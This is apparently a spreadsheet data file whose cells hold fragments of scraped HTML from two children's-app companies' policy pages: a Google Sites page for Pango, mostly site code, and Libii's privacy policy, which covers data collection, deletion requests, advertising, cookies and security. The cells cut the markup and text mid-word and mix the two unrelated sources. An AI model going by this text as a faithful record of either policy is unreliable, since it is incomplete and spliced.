nonce="WGI2oMSJrN7Yezbf3gniJw"&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10cQtwMbtfk8TiIEHmMuJDu_QKXCoPj8kw1GK74YJwVEN7Q7z6qRypPrP-SZzpam7yr4-M","je":1,"sstu":1681340317000504,"si":"CLzG3eK4pf4CFcvUSgAdWYEPnQ","gsc":null,"ei":[5703839,5704621,5706832,5706836,5707711,5735806,5737441,5737800,5738529,5740814,5743124,5746993,5747265,5748029,5752694,5753329,5754229,5754594,5760348,5760827,5762729,5764268,5765551,5766777,5770435,5773678,5774347,5776517,5776917,5777194,5786302,14101306,14101502,14101510,14101534,49369425,49372443,49375322,49376001,49378889,49451559,49453045,49472071,49474087,49512373,49622831,49623181,49624080,49644023,49648914,49654053,49700904,49765382,49816165,49822929,49823172,49824163,49839579,49842863,49898325,49924714,50022334,50127540,50166959,50168315,50174666,50263472,50291080,50313182,50322323,50347762,50455861,50468091],"crc":0,"cvi":[]},"docs-ccdil":false,"docs-eil":true,"docs-eoi":false,"info_params":{},"atari-jefp":"/_/view/jserror","docs-jern":"view","atari-rhpp":"/_/view","docs-eeytpgc":true,"docs-feytpgc":false,"docs-ecuach":false,"docs-cclt":2033,"docs-ecci":tru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 css?family=Roboto%3A300%2C400%2C500%2C700%7COpen%20Sans%3A400%2C400italic%2C700%2C700italic&amp;display=swap" rel="stylesheet" nonce="OfJLYoXnH0dBv_NChfszfw"&gt;&lt;link href="https://fonts.googleapis.com/</t>
  </si>
  <si>
    <t>css?family=Google+Sans:400,500|Roboto:300,400,500,700|Source+Code+Pro:400,700&amp;display=swap" rel="stylesheet" nonce="OfJLYoXnH0dBv_NChfszfw"&gt;&lt;link href="https://fonts.googleapis.com/ css?family=Comfortaa%3Ai%2Cbi%2C700%2C300%2C400%2C500&amp;display=swap" rel="stylesheet" nonce="OfJLYoXnH0dBv_NChfszfw"&gt;&lt;style nonce="OfJLYoXnH0dBv_NChfszfw"&gt;@media only screen and (max-width: 479px){.Rn3Z1b{font-size: 23.0pt;}}@media only screen and (min-width: 480px) and (max-width: 767px){.Rn3Z1b{font-size: 27.0pt;}}@media only screen and (min-width: 768px) and (max-width: 1279px){.Rn3Z1b{font-size: 30.0pt;}}@media only screen and (min-width: 1280px){.Rn3Z1b{font-size: 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nonce="OfJLYoXnH0dBv_NChfszfw"&gt;&lt;script nonce="WGI2oMSJrN7Yezbf3gniJw"&gt;&lt;/script&gt;&lt;title&gt;Pango - apps &amp;amp; games for kids - Policy&lt;/title&gt;&lt;style jsname="ptDGoc" nonce="OfJLYoXnH0dBv_NChfszfw"&gt;.M63kCb{background-color: rgba(255,255,255,1);}.OUGEr{color: rgba(33,33,33,1);}.duRjpb .OUGEr{color :</t>
  </si>
  <si>
    <t>rgba(106,106,106,1);}.LBrwzc .hDrhEe:hover{color: rgba(33,33,33,1);}.LBrwzc .jgXgSe:hover{color: rgba(33,33,33,1);}.LBrwzc .M9vuGd:hover{color: rgba(33,33,33,1);}.QcmuFb{padding-left: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200px;}@media only screen and (min-width: 1280px){.yxgWrb{margin-left: 250px;}}@media only screen and (max-width: 479px){.Zjiec{font-size: 16pt;}}@media only screen and (min-width: 480px) and (max-width: 767px){.Zjiec{font-size: 18pt;}}@media only screen and (max-width: 479px){.TlfmSc{font-size: 14pt;}}@media only screen and (min-width: 480px) and (max-width: 767px){.TlfmSc{font-size: 14pt;}}@media only screen and (max-width: 479px){.duRjpb{font-size: 20pt;}}@media only screen and (min-width: 480px) and (max-width: 767px){.duRjpb{font-size: 23pt;}}@media only screen and (max-width: 479px){.JYVBee{font-size: 15pt;}}@media only screen and (min-width: 480px) and (max-width: 767px){.JYVBee{font-size: 17pt;}}@media only screen and (max-width: 479px){.OmQG5e{font-size: 13pt;}}@media only screen and (min-width: 480px) and (max-width: 767px){.OmQG5e{font-size: 13pt;}}@media only screen and (max-width: 479px){.TlfmSc{font-size: 14pt;}}@media only screen and (min-width: 480px) and (max-width: 767px){.TlfmSc{font-size: 14pt;}}@media only screen and (max-width: 479px){.TMjjoe{font-size: 9pt;}}@media only screen and (min-width: 480px) and (max-width: 767px){.TMjjoe{font-size: 9pt;}}section[id="h.574bec4d7e3a54cb_26"] .IFuOkc:before{opacity: 0.0;}section[id="h.6e401cb7f622b5af_250"] .IFuOkc:before{opacity: 0.4;}&lt;/style&gt;&lt;script nonce="WGI2oMSJrN7Yezbf3gniJw"&gt;_at_config</t>
  </si>
  <si>
    <t>&lt;!DOCTYPE html&gt;&lt;html lang="en-US" itemscope itemtype="http://schema.org/WebPage"&gt;&lt;head&gt;&lt;meta charset="utf-8"&gt;&lt;script nonce="YMLU3H7JcUCGZU0EiyfuXg"&gt;var DOCS_timing={}; DOCS_timing['sl']=new Date().getTime();&lt;/script&gt;&lt;script nonce="YMLU3H7JcUCGZU0EiyfuXg"&gt;function _DumpException(e) {throw e;}&lt;/script&gt;&lt;script nonce="YMLU3H7JcUCGZU0EiyfuXg"&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2vwh0JkJpo5GLwEuat_wWb_FLFbETb-p_bVwjXhk0KZv0EP8MVfH5GrJiFkThrardBVdnV","je":1,"sstu":1681340317189165,"si":"CLCI6eK4pf4CFcLJSgAdaTcAHw","gsc":null,"ei":[5703839,5704621,5706832,5706836,5707711,5735806,5737441,5737800,5738529,5740814,5743124,5746993,5747263,5748029,5752694,5753329,5754229,5754594,5760348,5760827,5762259,5762729,5764268,5765551,5766777,5770435,5773678,5774347,5776517,5776917,5777194,5786302,14101306,14101502,14101510,14101534,49369425,49372443,49375322,49376001,49378889,49451559,49453045,49472071,49474087,49512373,49622831,49623181,49624080,49644023,49648914,49654053,49700904,49765382,49816165,49822929,49823172,49824153,49839579,49842863,49898325,49924714,50022334,50127540,50166959,50168315,50174666,50263472,50291080,50313182,50322323,50347762,50455861,50468091],"crc":0,"cvi":[]},"docs-ccdil":false,"docs-eil":true,"docs-eoi":false,"info_params":{},"atari-jefp":"/_/view/jserror","docs-jern":"view","atari-rhpp":"/_/view","docs-eeytpgc":true,"docs-feytpgc":false,"docs-ecuach":false,"docs-cclt":2033,"docs-ecci":true,"docs-esi":false,"docs-eytpgcv":0}; _docs_flag_cek= null ; if (window['DOCS_timing']) {DOCS_timing['ifdld']=new Date().getTime();}&lt;/script&gt;&lt;meta name="viewport" content="width=device-width, initial-scale=1"&gt;&lt;meta http-equiv="X-UA-Compatible" content="IE=edge"&gt;&lt;meta name="referrer" content="origin"&gt;&lt;link rel="icon" href="https://lh6.googleusercontent.com/DIrrUxUCdgwr4LODP-Wht9oAA9zrmxnR2NWnTiUsizzIuj0HUdZ8qyMomtYhjOk5N20HIJcpgyMe5E_dbytqZD6Uj2BryciDMK67vnihdiWgfQ"&gt;&lt;meta property="og:title" content="Pango - apps &amp;amp; games for kids - Policy"&gt;&lt;meta property="og:type" content="website"&gt;&lt;meta property="og:url" content="https://www.studio-pango.com/policy"&gt;&lt;meta property="og:description" content="
❙ Last update: March 15, 2022"&gt;&lt;meta itemprop="name" content="Pango - apps &amp;amp; games for kids - Policy"&gt;&lt;meta itemprop="description" content="
❙ Last update: March 15, 2022"&gt;&lt;meta itemprop="url" content="https://www.studio-pango.com/policy"&gt;&lt;meta itemprop="thumbnailUrl" content="https://lh5.googleusercontent.com/PivSmAkOYr_Xg1KeMwZ5YmGVvbkOi4LasMhgWBCI-LogCT5ZS7i-SPHPKMiMs96CZo2LKoYnTihjjfbdvdmtzYE=w16383"&gt;&lt;meta itemprop="image" content="https://lh5.googleusercontent.com/PivSmAkOYr_Xg1KeMwZ5YmGVvbkOi4LasMhgWBCI-LogCT5ZS7i-SPHPKMiMs96CZo2LKoYnTihjjfbdvdmtzYE=w16383"&gt;&lt;meta itemprop="imageUrl" content="https://lh5.googleusercontent.com/PivSmAkOYr_Xg1KeMwZ5YmGVvbkOi4LasMhgWBCI-LogCT5ZS7i-SPHPKMiMs96CZo2LKoYnTihjjfbdvdmtzYE=w16383"&gt;&lt;meta property="og:image" content="https://lh5.googleusercontent.com/PivSmAkOYr_Xg1KeMwZ5YmGVvbkOi4LasMhgWBCI-LogCT5ZS7i-SPHPKMiMs96CZo2LKoYnTihjjfbdvdmtzYE=w16383"&gt;&lt;link href="https://fonts.googleapis.com/</t>
  </si>
  <si>
    <t>css?family=Roboto%3A300%2C400%2C500%2C700%7COpen%20Sans%3A400%2C400italic%2C700%2C700italic&amp;display=swap" rel="stylesheet" nonce="I3uTtF30UeSmJghJqoVa6Q"&gt;&lt;link href="https://fonts.googleapis.com/ css?family=Google+Sans:400,500|Roboto:300,400,500,700|Source+Code+Pro:400,700&amp;display=swap" rel="stylesheet" nonce="I3uTtF30UeSmJghJqoVa6Q"&gt;&lt;link href="https://fonts.googleapis.com/ css?family=Comfortaa%3Ai%2Cbi%2C700%2C300%2C400%2C500&amp;display=swap" rel="stylesheet" nonce="I3uTtF30UeSmJghJqoVa6Q"&gt;&lt;style nonce="I3uTtF30UeSmJghJqoVa6Q"&gt;@media only screen and (max-width: 479px){.Rn3Z1b{font-size: 23.0pt;}}@media only screen and (min-width: 480px) and (max-width: 767px){.Rn3Z1b{font-size: 27.0pt;}}@media only screen and (min-width: 768px) and (max-width: 1279px){.Rn3Z1b{font-size: 30.0pt;}}@media only screen and (min-width: 1280px){.Rn3Z1b{font-size:</t>
  </si>
  <si>
    <t>30.0pt;}}@media only screen and (max-width: 479px){.jgG6ef{font-size: 17.0pt;}}@media only screen and (min-width: 480px) and (max-width: 767px){.jgG6ef{font-size: 17.0pt;}}@media only screen and (min-width: 768px) and (max-width: 1279px){.jgG6ef{font-size: 18.0pt;}}@media only screen and (min-width: 1280px){.jgG6ef{font-size: 18.0pt;}}&lt;/style&gt;&lt;link rel="stylesheet" href="https://www.gstatic.com/_/atari/_/ss/k=atari.vw.jffPnSbrV38.L.X.O/d=1/rs=AGEqA5liTY9eJ3KZzwxTWsMzfIyQn11GcQ" data-id="_cl" nonce="I3uTtF30UeSmJghJqoVa6Q"&gt;&lt;script nonce="YMLU3H7JcUCGZU0EiyfuXg"&gt;&lt;/script&gt;&lt;title&gt;Pango - apps &amp;amp; games for kids - Policy&lt;/title&gt;&lt;style jsname="ptDGoc" nonce="I3uTtF30UeSmJghJqoVa6Q"&gt;.M63kCb{background-color: rgba(255,255,255,1);}.OUGEr{color: rgba(33,33,33,1);}.duRjpb .OUGEr{color: rgba(0,0,0,1);}.JYVBee .OUGEr{color: rgba(0,0,0,1);}.OmQG5e .OUGEr{color: rgba(0,0,0,1);}.iwQgFb{background-color: rgba(211,211,211,1);}.ySLm4c{font-family: 'Open Sans', sans-serif;}.CbiMKe{background-color: rgba(251,208,5,1);}.qeLZfd .zfr3Q{color: rgba(33,33,33,1);}.qeLZfd .qnVSj{color: rgba(33,33,33,1);}.qeLZfd .Glwbz{color: rgba(33,33,33,1);}.qeLZfd .duRjpb{color:</t>
  </si>
  <si>
    <t>rgba(106,106,106,1);}.LBrwzc .hDrhEe:hover{color: rgba(33,33,33,1);}.LBrwzc .jgXgSe:hover{color: rgba(33,33,33,1);}.LBrwzc .M9vuGd:hover{color: rgba(33,33,33,1);}.QcmuFb{padding-left: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200px;}@media only screen and (min-width: 1280px){.yxgWrb{margin-left: 250px;}}@media only screen and (max-width: 479px){.Zjiec{font-size: 16pt;}}@media only screen and (min-width: 480px) and (max-width: 767px){.Zjiec{font-size: 18pt;}}@media only screen and (max-width: 479px){.TlfmSc{font-size: 14pt;}}@media only screen and (min-width: 480px) and (max-width: 767px){.TlfmSc{font-size: 14pt;}}@media only screen and (max-width: 479px){.duRjpb{font-size: 20pt;}}@media only screen and (min-width: 480px) and (max-width: 767px){.duRjpb{font-size: 23pt;}}@media only screen and (max-width: 479px){.JYVBee{font-size: 15pt;}}@media only screen and (min-width: 480px) and (max-width: 767px){.JYVBee{font-size: 17pt;}}@media only screen and (max-width: 479px){.OmQG5e{font-size: 13pt;}}@media only screen and (min-width: 480px) and (max-width: 767px){.OmQG5e{font-size: 13pt;}}@media only screen and (max-width: 479px){.TlfmSc{font-size: 14pt;}}@media only screen and (min-width: 480px) and (max-width: 767px){.TlfmSc{font-size: 14pt;}}@media only screen and (max-width: 479px){.TMjjoe{font-size: 9pt;}}@media only screen and (min-width: 480px) and (max-width: 767px){.TMjjoe{font-size: 9pt;}}section[id="h.574bec4d7e3a54cb_26"] .IFuOkc:before{opacity: 0.0;}section[id="h.6e401cb7f622b5af_250"] .IFuOkc:before{opacity: 0.4;}&lt;/style&gt;&lt;script nonce="YMLU3H7JcUCGZU0EiyfuXg"&gt;_at_config =</t>
  </si>
  <si>
    <t>[null,"AIzaSyChg3MFqzdi1P5J-YvEyakkSA1yU7HRcDI","897606708560-a63d8ia0t9dhtpdt4i3djab2m42see7o.apps.googleusercontent.com",null,null,null,null,null,null,null,null,null,null,null,"SITES_%s",null,null,null,null,null,null,null,null,null,["AHKXmL2vwh0JkJpo5GLwEuat_wWb_FLFbETb-p_bVwjXhk0KZv0EP8MVfH5GrJiFkThrardBVdnV",1,"CLCI6eK4pf4CFcLJSgAdaTcAHw",1681340317189165,[5703839,5704621,5706832,5706836,5707711,5735806,5737441,5737800,5738529,5740814,5743124,5746993,5747263,5748029,5752694,5753329,5754229,5754594,5760348,5760827,5762259,5762729,5764268,5765551,5766777,5770435,5773678,5774347,5776517,5776917,5777194,5786302,14101306,14101502,14101510,14101534,49369425,49372443,49375322,49376001,49378889,49451559,49453045,49472071,49474087,49512373,49622831,49623181,49624080,49644023,49648914,49654053,49700904,49765382,49816165,49822929,49823172,49824153,49839579,49842863,49898325,49924714,50022334,50127540,50166959,50168315,50174666,50263472,50291080,50313182,50322323,50347762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25803253-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[1681340317197,"atari_2023.14-Tue-0500_RC00","521729938",null,1,1,""],null,null,null,null,0,null,null,0,null,null,null,null,null,null,null,null,20,500,"https://domains.google.com",null,0,null,null,null,null,null,null,null,null,null,null,null,0,null,null,null,0,null,null,null,null,null,1,1,0,0,0,0,0,0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nonce="YMLU3H7JcUCGZU0EiyfuXg"&gt;&lt;/script&gt;&lt;script nonce="YMLU3H7JcUCGZU0EiyfuXg"&gt;(function(){/*
 Copyright The Closure Library Authors.
 SPDX-License-Identifier: Apache-2.0
*/
var a=(this||self)._jsa||{};a._cfc=void 0;a._aeh=void 0;}).call(this);
&lt;/script&gt;&lt;script</t>
  </si>
  <si>
    <t>nonce="YMLU3H7JcUCGZU0EiyfuXg"&gt;const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t>
  </si>
  <si>
    <t>&lt;!DOCTYPE html&gt;
&lt;html&gt;
&lt;head&gt;
	&lt;title&gt;Libii&lt;/title&gt;
	&lt;!-- Required meta tags --&gt;
	&lt;meta charset="utf-8"&gt;
	&lt;meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"&gt;
	&lt;meta name="format-detection" content="telephone=no" /&gt;
	&lt;title&gt;Privacy Policy &amp;#8211; Libii&lt;/title&gt;
	&lt;link rel="alternate" hreflang="zh-hans" href="https://libii.com/?page_id=2361&amp;#038;lang=zh-hans" /&gt;
&lt;link rel="alternate" hreflang="en" href="https://libii.com/?page_id=2357" /&gt;
&lt;link rel='dns-prefetch' href='//libii.com' /&gt;
&lt;link rel='dns-prefetch' href='//code.jquery.com' /&gt;
&lt;link rel='dns-prefetch' href='//cdnjs.cloudflare.com' /&gt;
&lt;link rel='dns-prefetch' href='//s.w.org' /&gt;
		&lt;script type="text/javascript"&gt;
			window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/11.2.0\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/11.2.0\/svg\/","svgExt":".svg","source":{"concatemoji":"\/\/libii.com\/wp-includes\/js\/wp-emoji-release.min.js"}};
			!function(a,b,c){function d(a,b){var c=String.fromCharCode;l.clearRect(0,0,k.width,k.height),l.fillText(c.apply(this,a),0,0);var d=k.toDataURL();l.clearRect(0,0,k.width,k.height),l.fillText(c.apply(this,b),0,0);var e=k.toDataURL();return d===e}function e(a){var b;if(!l||!l.fillText)return!1;switch(l.textBaseline="top",l.font="600 32px</t>
  </si>
  <si>
    <t>important;
	border: none !important;
	box-shadow: none !important;
	height: 1em !important;
	width: 1em !important;
	margin: 0 .07em !important;
	vertical-align: -0.1em !important;
	background: none !important;
	padding: 0 !important;
}
&lt;/style&gt;
	&lt;link rel='stylesheet' id='wp-block-library-css'  href='//libii.com/wp-includes/css/dist/block-library/style.min.css' type='text/css' media='all' /&gt;
&lt;link rel='stylesheet' id='contact-form-7-css'  href='//libii.com/wp-content/plugins/contact-form-7/includes/css/styles.css' type='text/css' media='all' /&gt;
&lt;link rel='stylesheet' id='rs-plugin-settings-css'  href='//libii.com/wp-content/plugins/revslider/public/assets/css/settings.css' type='text/css' media='all' /&gt;
&lt;style id='rs-plugin-settings-inline-css' type='text/css'&gt;
#rs-demo-id {}
&lt;/style&gt;
&lt;link rel='stylesheet' id='wpml-legacy-dropdown-0-css'  href='//libii.com/wp-content/plugins/sitepress-multilingual-cms/templates/language-switchers/legacy-dropdown/style.css' type='text/css' media='all' /&gt;
&lt;link rel='stylesheet' id='newsletter-css'  href='//libii.com/wp-content/plugins/newsletter/style.css' type='text/css' media='all' /&gt;
&lt;link rel='stylesheet' id='searchwp-live-search-css'  href='//libii.com/wp-content/plugins/searchwp-live-ajax-search/assets/styles/style.css' type='text/css' media='all' /&gt;
&lt;link rel='stylesheet' id='normalize-css'  href='//libii.com/wp-content/themes/techcode/vendor/style/normalize.css' type='text/css' media='all' /&gt;
&lt;link rel='stylesheet' id='bootstrap-css'  href='//libii.com/wp-content/themes/techcode/vendor/style/bootstrap/css/bootstrap.min.css' type='text/css' media='all' /&gt;
&lt;link rel='stylesheet' id='Font Awesome-css'  href='//libii.com/wp-content/themes/techcode/vendor/style/font-awesome/css/font-awesome.min.css' type='text/css' media='all' /&gt;
&lt;link rel='stylesheet' id='Magnific Popup-css'  href='//libii.com/wp-content/themes/techcode/components/magnific-popup/dist/magnific-popup.css' type='text/css' media='all' /&gt;
&lt;link rel='stylesheet' id='slickTheme-css'  href='//libii.com/wp-content/themes/techcode/components/slick/slick.css' type='text/css' media='all' /&gt;
&lt;link rel='stylesheet' id='slick-css'  href='//libii.com/wp-content/themes/techcode/components/slick/slick-theme.css' type='text/css' media='all' /&gt;
&lt;link rel='stylesheet' id='animate-css'  href='//libii.com/wp-content/themes/techcode/components/wow/animate.css' type='text/css' media='all' /&gt;
&lt;link rel='stylesheet' id='style-css'  href='//libii.com/wp-content/themes/techcode/style.css' type='text/css' media='all' /&gt;
&lt;script type='text/javascript' src='//libii.com/wp-includes/js/jquery/jquery.js'&gt;&lt;/script&gt;
&lt;script type='text/javascript' src='//libii.com/wp-includes/js/jquery/jquery-migrate.min.js'&gt;&lt;/script&gt;
&lt;script type='text/javascript' src='//libii.com/wp-content/plugins/sitepress-multilingual-cms/templates/language-switchers/legacy-dropdown/script.js'&gt;&lt;/script&gt;
&lt;link rel='https://api.w.org/' href='https://libii.com/index.php?rest_route=/' /&gt;
&lt;link rel="canonical" href="https://libii.com/?page_id=2357" /&gt;
&lt;link rel="alternate" type="application/json+oembed" href="https://libii.com/index.php?rest_route=%2Foembed%2F1.0%2Fembed&amp;#038;url=https%3A%2F%2Flibii.com%2F%3Fpage_id%3D2357" /&gt;
&lt;link rel="alternate" type="text/xml+oembed" href="https://libii.com/index.php?rest_route=%2Foembed%2F1.0%2Fembed&amp;#038;url=https%3A%2F%2Flibii.com%2F%3Fpage_id%3D2357&amp;#038;format=xml" /&gt;
&lt;meta name="generator" content="WPML ver:4.1.4 stt:60,1;" /&gt;
&lt;meta name="generator" content="Powered by Slider Revolution 5.4.6.6 - responsive, Mobile-Friendly Slider Plugin for WordPress with comfortable drag and drop interface." /&gt;
&lt;script type="text/javascript"&gt;function setREVStartSize(e){_x005F_x000D_
				document.addEventListener("DOMContentLoaded", function() {_x005F_x000D_
					try{ e.c=jQuery(e.c);var i=jQuery(window).width(),t=9999,r=0,n=0,l=0,f=0,s=0,h=0;_x005F_x000D_
						if(e.responsiveLevels&amp;&amp;(jQuery.each(e.responsiveLevels,function(e,f){f&gt;i&amp;&amp;(t=r=f,l=e),i&gt;f&amp;&amp;f&gt;r&amp;&amp;(r=f,n=e)}),t&gt;r&amp;&amp;(l=n)),f=e.gridheight[l]||e.gridheight[0]||e.gridheight,s=e.gridwidth[l]||e.gridwidth[0]||e.gridwidth,h=i/s,h=h&gt;1?1:h,f=Math.round(h*f),"fullscreen"==e.sliderLayout){var u=(e.c.width(),jQuery(window).height());if(void 0!=e.fullScreenOffsetContainer){var c=e.fullScreenOffsetContainer.split(",");if (c) jQuery.each(c,function(e,i){u=jQuery(i).length&gt;0?u-jQuery(i).outerHeight(!0):u}),e.fullScreenOffset.split("%").length&gt;1&amp;&amp;void 0!=e.fullScreenOffset&amp;&amp;e.fullScreenOffset.length&gt;0?u-=jQuery(window).height()*parseInt(e.fullScreenOffset,0)/100:void 0!=e.fullScreenOffset&amp;&amp;e.fullScreenOffset.length&gt;0&amp;&amp;(u-=parseInt(e.fullScreenOffset,0))}f=u}else void 0!=e.minHeight&amp;&amp;f&lt;e.minHeight&amp;&amp;(f=e.minHeight);e.c.closest(".rev_slider_wrapper").css({height:f})					_ x000D_
					}catch(d){console.log("Failure at Presize of Slider:"+d)}_x005F_x000D_
				});_x005F_x000D_
			};&lt;/script&gt;
&lt;/head&gt;
&lt;body class="page-template-default page page-id-2357" &gt;
	&lt;header class="pt-2 pb-2"&gt;
		&lt;div class="container"&gt;
			&lt;div class="row"&gt;
				&lt;div class="col-sm-2 col-4"&gt;
					&lt;a href="https://libii.com"&gt;
						&lt;img src="https://libii.com/wp-content/uploads/2019/07/Libii-New-Logo.png" id="logo" /&gt;
					&lt;/a&gt;
				&lt;/div&gt;
				&lt;div class="col-sm-10 col-8"&gt;
					&lt;div id="search2"&gt;
						&lt;i class="fa</t>
  </si>
  <si>
    <t>fa-search"&gt;&lt;/i&gt;
					&lt;/div&gt;
					&lt;nav class="navbar navbar-expand-lg navbar-light justify-content-end"&gt;
						&lt;button class="navbar-toggler" type="button" data-toggle="collapse" data-target="#navbarNavDropdown" aria-controls="navbarNavDropdown" aria-expanded="false" aria-label="Toggle navigation"&gt;
							&lt;span class="navbar-toggler-icon"&gt;&lt;/span&gt;
						&lt;/button&gt;
						&lt;div class="collapse navbar-collapse text-right" id="navbarNavDropdown"&gt;
							&lt;div class="menu-main-menu-container"&gt;&lt;ul id="menu" class="navbar-nav list-inline"&gt;&lt;li id="menu-item-21" class="list-inline-item menu-item menu-item-type-custom menu-item-object-custom menu-item-21"&gt;&lt;a href="http://www.libii.com/"&gt;Home&lt;/a&gt;&lt;/li&gt;
&lt;li id="menu-item-2563" class="menu-item menu-item-type-post_type menu-item-object-page current-menu-item page_item page-item-2357 current_page_item menu-item-2563"&gt;&lt;a href="https://libii.com/?page_id=2357" aria-current="page"&gt;Privacy Policy&lt;/a&gt;&lt;/li&gt;
&lt;li id="menu-item-22" class="list-inline-item menu-item menu-item-type-post_type menu-item-object-page menu-item-22"&gt;&lt;a href="https://libii.com/?page_id=8"&gt;Contact Us&lt;/a&gt;&lt;/li&gt;
&lt;li id="menu-item-229" class="list-inline-item menu-item menu-item-type-post_type menu-item-object-page menu-item-229"&gt;&lt;a href="https://libii.com/?page_id=225"&gt;Career&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;&lt;/div&gt;							&lt;div id="search"&gt; &lt;i class="fa fa-search" aria-hidden="true"&gt;&lt;/i&gt; &lt;/div&gt;
						&lt;/div&gt;
					&lt;/nav&gt;
				&lt;/div&gt;
			&lt;/div&gt;
			&lt;div id="mainSearch" style="display: none;"&gt;
				&lt;form action="" method="get"&gt;
					&lt;input type="text" name="s" id="s" value="" data-swplive="true" placeholder="Search" /&gt; &lt;!-- data-swplive="true" enables SearchWP Live Search --&gt;
				&lt;/form&gt;
			 &lt;/div&gt;
		&lt;/div&gt;
	&lt;/header&gt;
&lt;div id="main-body" class="container"&gt;
	&lt;div class="app-container m-6 p-6"&gt;
		&lt;h4&gt;
			&lt;center&gt;Privacy Policy&lt;/center&gt;
		&lt;/h4&gt;
		Libii Tech Limited and its affiliates (“Company” or “we”) respect the privacy of its users (“User” or “you”) and are committed to protect the User’s information, be it yours or your children’s.</t>
  </si>
  <si>
    <t>We believe that you have a right to know our practices regarding the information we may collect and use when you use our Products (as defined on the Terms of Use) and website (the “Service”).&lt;br/&gt;_x005F_x000D_
&lt;br/&gt;_x005F_x000D_
1. Your consent (important, please read carefully!)&lt;br/&gt;_x005F_x000D_
By accessing and/or using the Site or the Service, you agree to the terms and conditions set forth in this Privacy Policy, including to the collection and processing of your Personal Information (as defined below). Please note: if you disagree to any term provided herein, you may not access or use the Service.&lt;br/&gt;_x005F_x000D_
&lt;br/&gt;_x005F_x000D_
2.</t>
  </si>
  <si>
    <t>Which information we may collect on our Users?&lt;br/&gt;_x005F_x000D_
Non-personal Information: We use third-party services to collect Non-personal and non-identifiable information (“Non-personal Information”). To put it simply, we have no idea what is the identity of the User from which we have collected the Non-personal Information. Non-personal Information which is being gathered consists of technical information and behavioral information, as detailed below:&lt;br/&gt;_x005F_x000D_
Technical information:&lt;br/&gt;_x005F_x000D_
•</t>
  </si>
  <si>
    <t>Type of operation system (e.g. Windows, Linux, etc.)&lt;br/&gt;_x005F_x000D_
• Type of Browser (e.g. Explorer, Firefox, Chrome, Safari, etc.)&lt;br/&gt;_x005F_x000D_
• Screen resolution (e.g. 800×600, 1024×768, etc.)&lt;br/&gt;_x005F_x000D_
• Language (e.g. English)&lt;br/&gt;_x005F_x000D_
• Android or iOS Vendor (e.g. Galaxy, HTC, iPhone, etc.)&lt;br/&gt;_x005F_x000D_
• Flash version&lt;br/&gt;_x005F_x000D_
Behavioral information:&lt;br/&gt;_x005F_x000D_
• User’s interaction with the Service&lt;br/&gt;_x005F_x000D_
• User’s behavior on the Service&lt;br/&gt;_x005F_x000D_
• The amount of pictures user publishes after using the Service.&lt;br/&gt;_x005F_x000D_
• Any Similar behavioral information.&lt;br/&gt;_x005F_x000D_
• Installed application information&lt;br/&gt;_x005F_x000D_
 Personal Information: We do not collect any Personal Information when you or your children use our Products, however we allow you to join our newsletter should you wish to receive updates and information regarding products and services offered by the Company and its affiliates (the “Newsletter”). In order to join our Newsletter you will be asked to provide us with an active email address through the Site.</t>
  </si>
  <si>
    <t>You may remove your email address from mailing list at any time by clicking the remove option incorporated in the emails sent to you.&lt;br/&gt;_x005F_x000D_
PLEASE NOTE THAT JOINING THE NEWSLETTER IS NOT MANDATORY IN ORDER TO USE THE SERVICE.&lt;br/&gt;_x005F_x000D_
&lt;br/&gt;_x005F_x000D_
3. How do we collect information on our Users?&lt;br/&gt;_x005F_x000D_
Non-personal Information is gathered by third-party services while you access the Service. In other words, analytical third-party services are aware of your usage of the Site and the Service, and may collect the information relating to such usage.&lt;br/&gt;_x005F_x000D_
&lt;br/&gt;_x005F_x000D_
4.</t>
  </si>
  <si>
    <t>What are the purposes of the collection of information?&lt;br/&gt;_x005F_x000D_
 We collect Non-personal Information for the following purposes:&lt;br/&gt;_x005F_x000D_
• Enhance the User’s experience on the Service, including the ability to communicate with our Users through an internal notification mechanism incorporated in the Service.&lt;br/&gt;_x005F_x000D_
 • Learn about the preferences of Users and general trends on the Service through the study of aggregated data and statistics.&lt;br/&gt;_x005F_x000D_
&lt;br/&gt;_x005F_x000D_
5.</t>
  </si>
  <si>
    <t>How to request the deletion of data?&lt;br/&gt;_x005F_x000D_
 Users can request deletion of their data by contacting us, please email us at ff@libii.com, but note that we may retain certain information as required by law or for legitimate business purposes. We may also retain cached or archived copies of your account information for a certain period of time.&lt;br/&gt;_x005F_x000D_
&lt;br/&gt;_x005F_x000D_
6.</t>
  </si>
  <si>
    <t>Advertising&lt;br/&gt;_x005F_x000D_
 We accept advertisements from third party advertisers. These advertisers are carefully selected to provide information about products and services that we think may be of interest to our Users.</t>
  </si>
  <si>
    <t>Note that if you click on any of these advertisements, these advertisers may use cookies and other web-tracking technologies to collect non-personal and/or personal information about you. We recommend that you review the terms of use and privacy policy for any advertiser with which you are interacting before doing so. Their privacy policy, not ours, will apply to any of those interactions.&lt;br/&gt;_x005F_x000D_
&lt;br/&gt;_x005F_x000D_
7.</t>
  </si>
  <si>
    <t>Cookies &amp;amp; Local Storage&lt;br/&gt;_x005F_x000D_
When you access or use the Service, Company may use industry-wide technologies such as “cookies” and Flash (or similar technologies), which stores certain information on your computer (“Local Storage”) and which will allow us to enable automatic activation of certain features, and make your Service experience much more convenient and effortless. The cookies used by the Service are created per session, does not include any information about you, other than your session key and are removed as your session ends. It is easy to prohibit the Local Storage.</t>
  </si>
  <si>
    <t xml:space="preserve">Most browsers will allow you to erase cookies from your computer’s hard drive, block acceptance of cookies, or receive a warning before a cookie is stored. In order to erase or disable the Local Storage option in Flash you should use the settings option of Flash according to the specific instructions provided by the technology provider. However, if you block or erase cookies, or change the settings of Flash, your online experience may be limited.&lt;br/&gt;_x005F_x000D_
</t>
  </si>
  <si>
    <t>We also may use certain third-party cookies (e.g. Google Authentication). These are a different kind of cookies, stored on your computer by third parties, rather than by the Company. This kind of cookie is only read (and not altered by the Service) each time you visit the Service, and also when you visit certain websites or applications that uses similar cookies.</t>
  </si>
  <si>
    <t>Third-party cookies usually store only Non-personal Information, such as the web pages you have visited, the duration of your browsing, etc.&lt;br/&gt;_x005F_x000D_
&lt;br/&gt;_x005F_x000D_
8. Security&lt;br/&gt;_x005F_x000D_
 We take a great care in maintaining the security of the Service and your information and in preventing unauthorized access to it through industry standard technologies and internal procedures, including through the use of encryption mechanisms.</t>
  </si>
  <si>
    <t>However, we do not guarantee that unauthorized access will never occur.&lt;br/&gt;_x005F_x000D_
Third Party Software/Service&lt;br/&gt;_x005F_x000D_
